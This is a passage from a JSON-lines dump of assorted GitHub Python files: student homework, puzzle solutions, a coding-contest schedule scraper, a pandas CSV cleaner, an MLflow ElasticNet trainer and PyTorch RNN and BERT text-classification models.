줄의 요소를 zip 함수로 쌍을 이루게 하여 딕셔너리로 형변환 하여 변수 row에 할당했다.\n# append 함수를 사용해, row 변수를 앞에서 만든 리스트 변수 subway_data에 추가했다.\n\n\nprint('''==================== 테스트 1 ====================\n토요일 승차 정보만 모은 목록''')\ntest1 = []\nfor list in subway_data:\n if list['요일'] == '토' and list['구분'] == '승차':\n test1.append(list)\nprint(test1)\n# 수행예시에 제시된 대로 print 함수를 사용해 테스트 명과 탐색할 정보의 내용을 출력한다.\n# 탐색할 정보를 저장하기 위해 빈 리스트 변수 test1을 생성한다.\n# subway_data의 각 행을 탐색하기 위해 for 문을 사용했다.\n# if 문과 딕셔너리 키, 밸류를 사용하여 요일이 토요일, 구분이 승차인 데이터만을 가져온다.\n# 조건에 해당하는 행을 빈 리스트 test1에 추가하고, print 함수로 test1 리스트를 출력한다.\n\nprint('''==================== 테스트 2 ====================\n7-11시 승하차 인원이 1만명 이상인 요일의 목록''')\ntest2 = []\nfor list in subway_data:\n if int(list['7']) + int(list['8']) + \\\n int(list['9']) + int(list['10']) >= 10000:\n test2.append(list['요일'])\nprint(test2)\n# 수행예시에 제시된 대로 print 함수를 사용해 테스트 명과 탐색할 정보의 내용을 출력한다.\n# 탐색할 정보를 저장하기 위해 빈 리스트 변수 test2을 생성한다.\n# subway_data의 각 행을 탐색하기 위해 for 문을 사용했다.\n# 조건에 해당하는 데이터를 뽑아내기 위해 if 문을 사용했다.\n# '7','8','9','10' 키에 해당하는 값을 불러와 합계 계산을 위해 정수로 형변환하고, 합계가 10000 이상인 조건을 만든다.\n# 조건에 해당하는 행의 키 '요일'에 해당하는 값을 빈 리스트 test2에 추가하고, print 함수로 test2 리스트를 출력한다.\n\n\nprint('''==================== 테스트 3 ====================\n날짜가 짝수인 날짜 중 8-9시 승하차 인원보다 9-10시 승하차 인원이 많은 날들의 정보를 모은 목록''')\ntest3 = []\nfor list in subway_data:\n if int(list['날짜']) % 2 == 0 and int(list['8']) < int(list['9']):\n test3.append(list)\nprint(test3)\n# 수행예시에 제시된 대로 print 함수를 사용해 테스트 명과 탐색할 정보의 내용을 출력한다.\n# 탐색할 정보를 저장하기 위해 빈 리스트 변수 test3을 생성한다.\n# subway_data의 각 행을 탐색하기 위해 for 문을 사용했다.\n# 조건에 해당하는 데이터를 뽑아내기 위해 if 문을 사용했다.\n# 날짜가 짝수인 데이터를 뽑아내기 위해, key '날짜'에 해당하는 값을 가져와 정수로 형변환하고 2로 나눴을 때 나머지가 0인 조건을 만든다.\n# 8-9시 인원보다 9-10시 인원이 많은 날의 데이터를 가져오기 위해, 키 '8'과 키 '9'에 해당하는 값을 가져와 정수로 형변환하고\n# 비교 연산자를 사용하여 조건을 만든다.\n# 조건에 해당하는 행을 빈 리스트 test3에 추가하고, print 함수로 test3 리스트를 
출력한다.\n","repo_name":"cs13syy/snu-fira-bigdata-analytics","sub_path":"bigdata-analysis-using-python/homework/homework-10.py","file_name":"homework-10.py","file_ext":"py","file_size_in_byte":5605,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26932364913","text":"# Definition for singly-linked list.\r\n# class ListNode:\r\n#     def __init__(self, x):\r\n#         self.val = x\r\n#         self.next = None\r\n\r\nclass Solution:\r\n    def detectCycle(self, head: Optional[ListNode]) -> Optional[ListNode]:\r\n        values = {}\r\n        while head:\r\n            idx = id(head)\r\n            if idx in values:\r\n                return values[idx]\r\n            values[idx] = head\r\n            head = head.next\r\n        return head\r\n    ","repo_name":"aditi-govindu/LeetCode-DSA","sub_path":"LeetCode75/Level1/LinkedListCycle2.py","file_name":"LinkedListCycle2.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31293780403","text":"#Membaca input dua bilangan bulat\nnum_1 = int(input())\nnum_2 = int(input())\n\n#Membandingkan nilai num_1 dan num_2\nif num_1 < num_2:\n    print(num_1)\nelif num_1 > num_2:\n    print(num_2)\nelse:\n    print(num_1)","repo_name":"eugeniusms/DDP0-Snakify","sub_path":"03 condition if then else/01_minimum_of_two_number.py","file_name":"01_minimum_of_two_number.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72582648513","text":"# Problem 4: Largest palindrome product\n\nimport time\n\ndef Answer():\n    for firstHalf in range(998, 0, -1):\n        firstHalfString = str(firstHalf)\n        palindrome = int(firstHalfString + firstHalfString[::-1])\n        for x in range(999, 99, -1):\n            if palindrome % x == 0:\n                y = int(palindrome / x)\n                if len(str(y)) == 3:\n                    return palindrome, x, y\n\nstartTime = time.time()\nanswer, x, y = Answer()\nprint(\"Answer = \" + str(answer) + \" (\" + str(x) + \" * \" + str(y) + \") in {:.3f}\".format(time.time() - startTime) + \"s\")","repo_name":"robert-s-reed/Project-Euler","sub_path":"Project Euler/p004.py","file_name":"p004.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23442081971","text":"from __future__ import print_function\nimport sys\n\n\ndef read_input(f):\n    T = int(f.readline().strip())\n\n    for i in xrange(T):\n        A, B, K = [int(val) for val in f.readline().strip().split(\" \")]\n        yield (A, B, K)\n\n\ndef check_case(case):\n    A, B, K = case\n    acc = 0\n    for a in xrange(A):\n        for b in xrange(B):\n            if a & b < K:\n                acc += 1\n    return str(acc)\n\n\nif __name__ == \"__main__\":\n    input_filename = sys.argv[1]\n    with open(input_filename) as input_file:\n        case_no = 0\n        for case in read_input(input_file):\n            case_no += 1\n            # check_case(case)\n            print(\"Case #\" + str(case_no) + \": \" + check_case(case))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_143/422.py","file_name":"422.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30096162815","text":"import requests\nfrom lxml import etree\nimport time\nimport json\n\ndef get_url(url):\n    # 获取页面文件\n    headers = {\n        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62'\n    }\n    res = requests.get(url, headers=headers)\n    html = 
res.content.decode(\"utf-8\")\n return html\n\ndef Unix_time(dt): # Time -> Unix Time\n #转换成时间数组\n timeArray = time.strptime(dt, \"%Y-%m-%d %H:%M:%S\")\n #转换成时间戳\n timestamp = int(time.mktime(timeArray))\n return timestamp\n\ndef Real_time(dt): # Unix Time -> Time\n t = time.gmtime(dt)\n return str(t.tm_year) + '-' + str(t.tm_mon).rjust(2,'0') + '-' + str(t.tm_mday).rjust(2,'0') + ' ' + str(t.tm_hour).rjust(2,'0') + ':'+str(t.tm_min).rjust(2,'0')+ ':'+str(t.tm_sec).rjust(2,'0')\n\ndef getAtcoder():\n tree = etree.HTML( get_url('https://atcoder.jp/') )\n result = []\n for i in range(1,3):\n \n # 获取比赛名称 地址 时间\n title = tree.xpath('//*[@id=\"contest-table-upcoming\"]/div/table/tbody/tr[{0}]/td[2]/small/a/text()'.format(i))\n link = tree.xpath('//*[@id=\"contest-table-upcoming\"]/div/table/tbody/tr[{0}]/td[2]/small/a/@href'.format(i))\n time = tree.xpath('//*[@id=\"contest-table-upcoming\"]/div/table/tbody/tr[{0}]/td[1]/small/a/time/text()'.format(i))\n if len(title)==0: break\n\n # time转Unix format时间戳\n # time = 2023-01-29 21:00:00+0900\n # 先变成UTC+8\n # 日本时间快一个小时 \n time = Unix_time(time[0][0:19]) - 1*3600 + 8*3600\n\n result.append( [ time , title[0] , 'https://atcoder.jp/' + link[0] ] )\n\n return result\n\ndef getCodeforces():\n\n # codeforces 提供了api 返回了比赛列表\n data = get_url('https://codeforces.com/api/contest.list?gym=false')\n data = json.loads(data)[\"result\"] # 转成字典\n\n result = []\n for contest in data:\n if contest['phase'] != 'BEFORE' : break\n result.append( [ contest['startTimeSeconds']+8*3600 , contest['name'] , 'https://codeforces.com/contests/' + str(contest['id']) ] )\n\n if len(result) >= 2: return [result[-1],result[-2]]\n elif len(result)==1 : return [result[0]]\n return []\n\n\ndef getNowcoder():\n # 直接抄抄Atcoder的就好了\n tree = etree.HTML( get_url('https://ac.nowcoder.com/acm/contest/vip-index') )\n result = []\n for i in range(2,4):\n \n # 获取比赛名称 地址 时间\n title = tree.xpath('/html/body/div/div[3]/div[1]/div[2]/div[{0}]/div[2]/div[1]/h4/a/text()'.format(i))\n link = tree.xpath('/html/body/div/div[3]/div[1]/div[2]/div[{0}]/div[2]/div[1]/h4/a/@href'.format(i))\n time = tree.xpath('/html/body/div/div[3]/div[1]/div[2]/div[{0}]/div[2]/div[1]/ul/li[2]/text()'.format(i))\n if len(title)==0: break\n\n # '比赛时间: 2023-01-30 13:00\\n 至 2023-01-30 18:00\\n (时长:5小时)'\n # UTC + 8\n time = Unix_time(time[0][9:25]+\":00\") + 8*3600\n result.append( [ time , title[0] , 'https://ac.nowcoder.com/' + link[0] ] )\n\n return result\n\ndef getContest():\n\n resultNowcoder = getNowcoder()\n resultAtcoder = getAtcoder()\n resultCodeforces = getCodeforces()\n\n sstr = 'Hello~ 我是CE酱捏\\n'\n \n sstr += '近期牛客比赛:\\n'\n if(len(resultNowcoder)==0): sstr += 'None\\n\\n'\n else:\n for contest in resultNowcoder:\n sstr += contest[1] + '\\n' + contest[2] + '\\n' + Real_time(contest[0]) + '\\n\\n'\n\n sstr += '\\n'\n\n sstr += '近期Codeforces比赛:\\n'\n if(len(resultCodeforces)==0): sstr += 'None\\n\\n'\n else:\n for contest in resultCodeforces:\n sstr += contest[1] + '\\n' + contest[2] + '\\n' + Real_time(contest[0]) + '\\n\\n'\n\n sstr += '\\n'\n\n sstr += '近期Atcoder比赛:\\n'\n if(len(resultAtcoder)==0): sstr += 'None\\n\\n'\n else:\n for contest in resultAtcoder:\n sstr += contest[1] + '\\n' + contest[2] + '\\n' + Real_time(contest[0]) + '\\n\\n'\n \n return sstr","repo_name":"Neworld1111/PythonQQbot","sub_path":"crontab/oj.py","file_name":"oj.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 
+{"seq_id":"843391848","text":"import pandas as pd\r\nimport datetime as dt\r\n\r\n#Getting assigning the current year\r\ncurrent_year=int(dt.datetime.now().year)\r\n\r\n## reading file from CSV sheet and mapping it to Dataframe\r\nsamp=pd.read_csv('c:\\\\Users\\\\PycharmProjects\\\\data.csv')\r\nsamp_df=pd.DataFrame(samp)\r\n\r\n## concatenating the 2 columns in the excel sheet to one column\r\nsamp_df['NAME']=samp_df['SURNAME']+' ' + samp['FIRST_NAME']\r\n\r\n##addding new column to get current year\r\nsamp_df['CURRENTYEAR']=current_year\r\n\r\n##now trying to get current age using year of birth and current year value\r\nsamp_df['AGE']=samp_df['CURRENTYEAR']-samp_df['YEAR_OF_BIRTH']\r\n\r\n## Getting only selected column\r\n##samp_df=samp_df[['NAME','YEAR_OF_BIRTH','EMAIL','RELIGION','CURRENTYEAR','AGE']]\r\n\r\n## Converting the few column values to title case\r\nsamp_df[\"NAME\"]=samp_df[\"NAME\"].str.title()\r\nsamp_df[\"NATIONALITY\"]=samp_df[\"NATIONALITY\"].str.title()\r\nsamp_df[\"RELIGION\"]=samp_df[\"RELIGION\"].str.title()\r\n\r\n## Getting only final specified columns\r\nsamp_df=samp_df[['NAME','AGE','EMAIL','NATIONALITY','RELIGION']]\r\n\r\nprint(\"THE FINAL OUTPUT DATA \\n \", samp_df)\r\n\r\n## Sending the output to excel sheet\r\nsamp_df.to_csv(\"c:\\\\Users\\\\PycharmProjects\\\\output.csv\")\r\n\r\nprint(\"the output file has been generated\")\r\n","repo_name":"Bhuvana-hub/Python","sub_path":"exceldatacheck.py","file_name":"exceldatacheck.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1239650497","text":"def main():\n name = raw_input('your name: ')\n\n gender = None\n genders = ['man', 'woman']\n\n while not gender in genders:\n gender = raw_input('your gender: ')\n \n if gender == 'man':\n print(\"hi {name}! i know that you're a man\".format(name=name))\n else:\n print(\"hi {}! i know that you're a woman\".format(name))\n answer = None\n while answer not in ['y','n']:\n answer = raw_input(\"would you like to sum up a few numbers? 
(y/n) \")\n if answer == 'y':\n sum_numbers()\n \n\ndef sum_numbers():\n print(\"type numbers; hit enter; hit twice when you're done\")\n sum_ = 0\n number = None\n while number != '':\n number = raw_input('>>> ')\n sum_ += get_number(number)\n print(\"here's your sum: {}\".format(sum_))\n\ndef get_number(number):\n if not number:\n return 0\n if number.isdigit():\n return int(number)\n import numbers\n try:\n return float(number)\n except ValueError:\n print(\"well, that's not a number\")\n return 0\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"vladiibine/hacks","sub_path":"hacks/codedotpy/codedotpy.py","file_name":"codedotpy.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24270612608","text":"'''\nModeling the wine quality dataset to predict the quality of wine based on \nquatitative features like the wine's \"fixed acidity\", \"pH\", \"residual sugar\" etc..\n\nDataset: Wine quality dataset, from UCI repository\nModel : ElasticNet\nTracking: MLFlow\n'''\n\nimport os\nimport sys\nimport warnings\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import ElasticNet\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error, r2_score\nimport mlflow\nimport mlflow.sklearn\nfrom urllib.parse import urlparse\n\n\nimport logging\n\nlogging.basicConfig(level=logging.WARN)\nlogger = logging.getLogger(__name__)\n\ndef data_split(data):\n train, test = train_test_split(data)\n X_train = train.drop([\"quality\"], axis=1)\n X_test = test.drop([\"quality\"], axis=1)\n y_train = train[\"quality\"]\n y_test = test[\"quality\"]\n\n return X_train, X_test, y_train, y_test\n \n\ndef eval_metrics(acutal, pred):\n rmse = np.sqrt(mean_squared_error(acutal, pred))\n mae = mean_absolute_error(acutal, pred)\n r2 = r2_score(acutal, pred)\n\n\n\n return rmse, mae, r2\n\nif __name__==\"__main__\":\n warnings.filterwarnings(\"ignore\")\n np.random.seed(60)\n\n # Read the wine quality dataset from the UCI repository\n url_csv = (\n \"http://archive.ics.uci.edu/ml/machine-learning-databases/wine-quality/winequality-red.csv\"\n )\n try:\n data = pd.read_csv(url_csv, sep=\";\")\n except Exception as e:\n logger.exception(\n \"Unable to download training & test CSV. Check the connection. Error: %s\", e\n )\n \n X_train, X_test, y_train, y_test = data_split(data)\n\n alpha = float(sys.argv[1]) if len(sys.argv) > 1 else 0.5 # alph = 0 --> ordinary least squares solved by LinearRegression Object. 
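With l1_ratio=1 the penalty is pure L1 (lasso); l1_ratio=0 gives pure L2 (ridge).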
\n l1_ratio = float(sys.argv[2]) if len(sys.argv) > 2 else 0.5 # L1-penalty = 1 and L2-penalty = 0\n\n with mlflow.start_run():\n lr = ElasticNet(alpha=alpha, l1_ratio=l1_ratio, random_state=60)\n lr.fit(X_train, y_train)\n\n predicted_qualities = lr.predict(X_test)\n\n (rmse, mae, r2) = eval_metrics(y_test, predicted_qualities)\n\n output = f\"\"\"\n {'-'*40}\n Elasticnet Model (alpha={alpha}, l1_ratio={l1_ratio})\n RMSE : {rmse}\n MAE : {mae}\n R2 : {r2}\n {'-'*40}\n \"\"\"\n print(output)\n \n mlflow.log_param(\"alpha\", alpha)\n mlflow.log_param(\"l1_ratio\", l1_ratio)\n mlflow.log_metric(\"rmse\", rmse)\n mlflow.log_metric(\"mae\", mae)\n mlflow.log_metric(\"r2\", r2)\n\n tracking_url_type_store = urlparse(mlflow.get_tracking_uri()).scheme\n\n # Model registry does not work with file store\n if tracking_url_type_store != \"file\":\n\n # Register the model\n # Refer: https://mlflow.org/docs/latest/model-registry.html#api-workflow\n mlflow.sklearn.log_model(lr, \"model\", registered_model_name=\"ElasticnetWineModel\")\n else:\n mlflow.sklearn.log_model(lr, \"model\")\n\n\n\n\n","repo_name":"karthikkaiplody/MLFlow-Prod","sub_path":"src/sklearn_elasticnet_model/model_train.py","file_name":"model_train.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1193764345","text":"# File for holding statistic calculations\nimport numpy as np\n\n\nclass StatCalc:\n\n def __init__(self, sb_name):\n self.sb_name = np.array(sb_name)\n self.sum_of = np.sum(self.sb_name)\n self.mean_of = self.sum_of / len(sb_name)\n # The variance was found by using a more closed form of the summation formula for sample variance\n # 1/(n-1) * (sum((xi - x_bar)^2) where the only sums need to compute are now xi and xi^2\n self.var_of = (1 / (len(self.sb_name) - 1)) * (np.sum(np.square(self.sb_name)) - 2 * self.mean_of *\n self.sum_of + len(self.sb_name) * self.mean_of ** 2)\n","repo_name":"donovan-k/StudentPerfDataAnalysis","sub_path":"StatCalculation.py","file_name":"StatCalculation.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27689694198","text":"#################################################\n# Lab2\n#team: kjchin , zhenyanw\n#################################################\n\nimport cs112_f17_week2_linter\nimport math\n\n#################################################\n# Helper functions\n#################################################\n\ndef almostEqual(d1, d2, epsilon=10**-7):\n # note: use math.isclose() outside 15-112 with Python version 3.5 or later\n return (abs(d2 - d1) < epsilon)\n\nimport decimal\ndef roundHalfUp(d):\n # Round to nearest with ties going away from zero.\n rounding = decimal.ROUND_HALF_UP\n # See other rounding options here:\n # https://docs.python.org/3/library/decimal.html#rounding-modes\n return int(decimal.Decimal(d).to_integral_value(rounding=rounding))\n\n# Put your solution to getKthDigit here!\ndef getKthDigit(n, k):\n \n if k <= 0:\n return None\n \n k -= 1\n \n positive_num = abs(n)\n return (positive_num // (10 ** k)) % 10\n \n\n# See if you can rewrite isPrime from lecture here!\n\n#################################################\n\ndef numberLength(x):\n count=0\n x = abs(x)\n while x>0:\n x = x//10\n count += 1\n return count\n\n\n\ndef countMatchingDigits(x, y):\n \n # variables\n count = 0\n x_len = numberLength(x) \n y_len = numberLength(y)\n x_value = 0 # 
tracks value of x's digits\n    y_value = 0 # tracks value of y's digits\n    \n    for x_pos in range(1, x_len + 1):\n        x_value = getKthDigit(x, x_pos)\n        \n        for y_pos in range(1, y_len + 1):\n            y_value = getKthDigit(y, y_pos)\n            \n            if x_value == y_value:\n                count += 1\n    return count\n    \n\ndef rotateNumber(x):\n    # 1234 returns 4123: the last digit moves to the front\n    l = numberLength(x) - 1\n    y = x%10\n    x = x//10\n    z = y*(10**l)\n    return x + z\n\ndef isPrime(n):\n    if (n == 2):\n        return True\n    if (n < 2):\n        return False\n    if (n % 2 == 0):\n        return False\n    mfactor = roundHalfUp(n**0.5)\n    for factor in range(3, mfactor+1, 2):\n        if (n % factor == 0):\n            return False\n    return True\n\ndef isCircularPrime(x):\n    # a circular prime stays prime under every rotation of its digits\n    if x <= 0:\n        return False\n    l = numberLength(x)\n    for i in range(l):\n        if not isPrime(x):\n            return False\n        x = rotateNumber(x)\n    return True\n\n\n#input: n (number), to get nth circular prime (0-indexed)\n#edge case: input is zero\ndef nthCircularPrime(n):\n    n += 1\n    num = 0   #all numbers checked until we find nth circular prime\n    prime = 0 #number of circular primes found so far\n    \n    while prime < n:\n        num += 1\n        if isCircularPrime(num):\n            prime += 1\n    return num\n\n\ndef isEmirpsPrime(n):\n    # an \"Emirp Prime\" is a prime that becomes a *different* prime when its\n    # decimal digits are reversed (13 -> 31), so palindromic primes do not count\n    reversed_n = int(str(n)[::-1])\n    return isPrime(n) and isPrime(reversed_n) and reversed_n != n\n\ndef nthEmirpsPrime(n):\n    #non-neg int n, returns the nth \"Emirp Prime\" (0-indexed)\n    n += 1\n    numb = 0  #numbers checked until nth emirp\n    emirp = 0 #number of emirps found so far\n    \n    while emirp < n:\n        numb += 1\n        if isEmirpsPrime(numb):\n            emirp += 1\n    return numb\n    \n    \n\n######################################################################\n# ignore_rest: The autograder will ignore all code below here\n######################################################################\n\n#################################################\n# Test Functions\n#################################################\n\ndef testNumberLength():\n    print('Testing numberLength()... 
', end='')\n assert(numberLength(12) == 2)\n assert(numberLength(3) == 1)\n assert(numberLength(89) == 2)\n assert(numberLength(12345) == 5)\n assert(numberLength(120021) == 6)\n assert(numberLength(5000) == 4)\n print('Passed!')\n\ndef testCountMatchingDigits():\n print('Testing countMatchingDigits()... ', end='')\n assert(countMatchingDigits(1234, 2071) == 2)\n assert(countMatchingDigits(2203, 1527) == 2)\n assert(countMatchingDigits(5, 1253) == 1)\n assert(countMatchingDigits(18737, 7) == 2)\n assert(countMatchingDigits(1220, 7322) == 4)\n assert(countMatchingDigits(1234, 5678) == 0)\n print('Passed!')\n\ndef testRotateNumber():\n print('Testing rotateNumber()... ', end='')\n assert(rotateNumber(1234) == 4123)\n assert(rotateNumber(4123) == 3412)\n assert(rotateNumber(3412) == 2341)\n assert(rotateNumber(2341) == 1234)\n assert(rotateNumber(5) == 5)\n assert(rotateNumber(111) == 111)\n print('Passed!')\n\ndef testIsCircularPrime():\n print('Testing isCircularPrime()... ', end='')\n assert(isCircularPrime(2) == True)\n assert(isCircularPrime(11) == True)\n assert(isCircularPrime(13) == True)\n assert(isCircularPrime(79) == True)\n assert(isCircularPrime(197) == True)\n assert(isCircularPrime(1193) == True)\n print('Passed!')\n\ndef testNthCircularPrime():\n print('Testing nthCircularPrime()... ', end='')\n assert(nthCircularPrime(0) == 2)\n assert(nthCircularPrime(4) == 11)\n assert(nthCircularPrime(5) == 13)\n assert(nthCircularPrime(11) == 79)\n assert(nthCircularPrime(15) == 197)\n assert(nthCircularPrime(25) == 1193)\n print('Passed!')\n\ndef testNthEmirpsPrime():\n print('Testing nthEmirpsPrime()... ', end='')\n assert(nthEmirpsPrime(0) == 13)\n assert(nthEmirpsPrime(5) == 73)\n assert(nthEmirpsPrime(10) == 149)\n assert(nthEmirpsPrime(20) == 701)\n assert(nthEmirpsPrime(30) == 941)\n print('Passed.')\n\n#################################################\n# testAll and main\n#################################################\n\ndef testAll():\n testNumberLength()\n testCountMatchingDigits()\n testRotateNumber()\n testIsCircularPrime()\n testNthCircularPrime()\n testNthEmirpsPrime()\n\ndef main():\n cs112_f17_week2_linter.lint() # check style rules\n testAll()\n\nif __name__ == '__main__':\n main()\n","repo_name":"Anisha7/Python-Algorithms","sub_path":"lesson2/lab/lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":7735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"15627699156","text":"'''\nFile Defining RNN Architectures and Custom Datasets for RNN and Transformer Models\nVikram Reddy Ardham\n'''\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import Dataset, DataLoader\n\nclass mydataset(Dataset):\n '''\n Pytorch Dataset class to create a a dataloader\n '''\n def __init__(self, x, y):\n super().__init__()\n self.x = torch.tensor(x, dtype=torch.long)\n self.y = torch.tensor(y)\n \n def __len__(self):\n return self.x.size()[0]\n \n def __getitem__(self, ix):\n return self.x[ix], self.y[ix]\n\nclass CustomDataset(Dataset):\n '''\n Custom Dataset that tokenizes input text data for the transformer model\n '''\n def __init__(self, x, y, tokenizer, max_len):\n self.tokenizer = tokenizer\n self.data = x\n self.targets = y\n self.maxlen = max_len\n \n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, idx):\n inputs = self.tokenizer.encode_plus(self.data[idx], add_special_tokens=True, \n max_length=self.maxlen, 
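# note: pad_to_max_length is deprecated in newer transformers releases; padding='max_length' is the replacement\n                                            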
pad_to_max_length=True,\n return_token_type_ids=True, truncation=True)\n return {'ids': torch.tensor(inputs['input_ids'], dtype=torch.long),\n 'mask':torch.tensor(inputs['attention_mask'], dtype=torch.long),\n 'token_type_ids':torch.tensor(inputs['token_type_ids'], dtype=torch.long),\n 'targets':torch.tensor(self.targets[idx], dtype=torch.long)}\n\nclass SpatialDropout(nn.Dropout2d):\n '''\n Spatial Dropout for the embedding layer\n Refactor the existing Dropou2d class in PyTorch\n '''\n def forward(self, inps):\n inps =inps.unsqueeze(2)\n inps = inps.permute(0, 3, 2, 1)\n inps = super().forward(inps)\n inps = inps.permute(0, 3, 2, 1)\n inps = inps.squeeze(2)\n return inps\n\nclass myArch(nn.Module):\n '''Basic RNN based Text-classification architecture'''\n def __init__(self, emb_enc, seq_ln, hd_sz, stacks=2, CHOICE='LSTM'):\n super().__init__()\n self.emb = emb_enc\n self.seq_ln = seq_ln\n self.hd_sz = hd_sz\n self.emb_sz = emb_enc.embedding_dim\n self.bidirectional = False\n self.emb_dropout = SpatialDropout(p=0.4)\n \n # Choice of the type of RNN\n ARCH = {'LSTM': nn.LSTM(input_size=self.emb_sz, \n hidden_size=self.hd_sz,\n num_layers =stacks, bias=True, \n bidirectional=self.bidirectional, dropout=0.8,\n batch_first=True), \n 'GRU': SimpleGRU(self.seq_ln, self.emb_sz, self.hd_sz) , \n 'Vanilla RNN': SimpleRNN(self.seq_ln, self.emb_sz, self.hd_sz), }\n \n self.RNN = ARCH[CHOICE]\n \n self.dropout = nn.Dropout(p=0.4)\n Nout = 128\n self.linear = nn.Linear(self.hd_sz*2*(1+int(self.bidirectional)), Nout)\n self.batchnorm = nn.BatchNorm1d(Nout)\n self.out = nn.Linear(Nout, 5)\n\n def forward(self, X):\n '''\n 1. Embedding layer\n 2. Spatial Dropout\n 3. RNN layer\n 4. concatenate (avg_pool, max_pool)\n 5. Linear Layer\n 5. Batch Normalization\n 6. Dropout\n 7. Linear Layer to output class probabilities (5 classes here)\n '''\n h = self.emb(X)\n h = self.emb_dropout(h)\n gru_out, _ = self.RNN(h)\n\n avg_pool = torch.mean(gru_out, 1)\n max_pool, _ = torch.max(gru_out, 1)\n conc = torch.cat((avg_pool, max_pool), 1)\n \n conc = self.batchnorm(nn.ReLU()(self.linear(conc)))\n conc = self.dropout(conc)\n out = self.out(conc)\n \n return out\n\n# My RNN\nclass SimpleRNN(nn.Module):\n '''Vanilla RNN implemented from Scracth '''\n def __init__(self, seq_ln, emb_sz, hd_sz):\n super(SimpleRNN, self).__init__()\n \n self.output_sz = 5\n self.hd_sz = hd_sz\n \n self.h = torch.zeros(1, self.hd_sz)\n self.i2h = nn.Linear(emb_sz, self.hd_sz)\n self.h2h = nn.Linear(hd_sz, hd_sz)\n \n def forward(self, x):\n '''\n 1. Input (embedding) to hidden\n 2. Hidden to hidden\n 3. 
Add them and apply activation\n        '''\n        h = self.h\n        out = []\n        for xi in torch.transpose(x, 0, 1):\n            # carry the hidden state forward through time\n            h = torch.tanh(self.i2h(xi) + self.h2h(h))\n            out.append(h)\n        return torch.stack(out, dim=1), 1 # Dummy output as tuple to have a consistent structure with PyTorch\n\n#rnn_loop\ndef rnn_loop(cell, h, x):\n    res = []\n    for x_ in x.transpose(0,1):\n        h = cell(x_, h)\n        res.append(h)\n    return torch.stack(res, dim=1)\n\n\nclass GRUCell(nn.Module):\n    '''Inspired from the fastai-nlp course'''\n    def __init__(self, ni, nh):\n        super(GRUCell, self).__init__()\n        self.ni, self.nh = ni, nh\n        self.i2h = nn.Linear(ni, 3*nh)\n        self.h2h = nn.Linear(nh, 3*nh)\n    \n    def forward(self, x, h):\n        '''\n        return a weighted mean of the old state and the new gate,\n        where the weight is the update gate\n        '''\n        gate_x = self.i2h(x).squeeze()\n        gate_h = self.h2h(h).squeeze()\n        i_r,i_u,i_n = gate_x.chunk(3, 1)\n        h_r,h_u,h_n = gate_h.chunk(3, 1)\n        \n        resetgate = torch.sigmoid(i_r + h_r)\n        updategate = torch.sigmoid(i_u + h_u)\n        newgate = torch.tanh(i_n + (resetgate*h_n))\n        return updategate*h + (1-updategate)*newgate\n\n#My GRU \nclass SimpleGRU(nn.Module):\n    '''\n    Combine the GRUcell with the RNN loop\n    '''\n    def __init__(self, seq_ln, emb_sz, hd_sz):\n        super().__init__()\n        self.hd_sz = hd_sz\n        self.rnnc = GRUCell(emb_sz, hd_sz)\n    \n    def forward(self, x):\n        h = torch.zeros(1, x.size()[0], self.hd_sz)\n        res = rnn_loop(self.rnnc, h, x)\n        self.h = res[:, -1].detach()\n        res = torch.transpose(torch.squeeze(res), 0, 1)\n        return res, 1 # Dummy output 1 \n\nclass BertModel(nn.Module):\n    '''Bert Model Class for text-classification \n    Adding a dropout layer and linear layer to spit out 5 class probabilities'''\n    def __init__(self):\n        super().__init__()\n        # transformers is only used by this class and is missing from the module-level imports\n        import transformers\n        self.model_name = 'bert-base-cased'\n        self.l1 = transformers.BertModel.from_pretrained(self.model_name)\n        self.l2 = nn.Dropout(0.3)\n        self.l3 = nn.Linear(768, 5)\n\n    def forward(self, ids, mask, token_type_ids):\n        output_1 = self.l1(ids, attention_mask = mask, token_type_ids=token_type_ids)\n        output_2 = self.l2(output_1[1])\n        output = self.l3(output_2)\n        return output\n    ","repo_name":"Vikramardham/nlp_text_classification","sub_path":"nlp_models.py","file_name":"nlp_models.py","file_ext":"py","file_size_in_byte":6176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
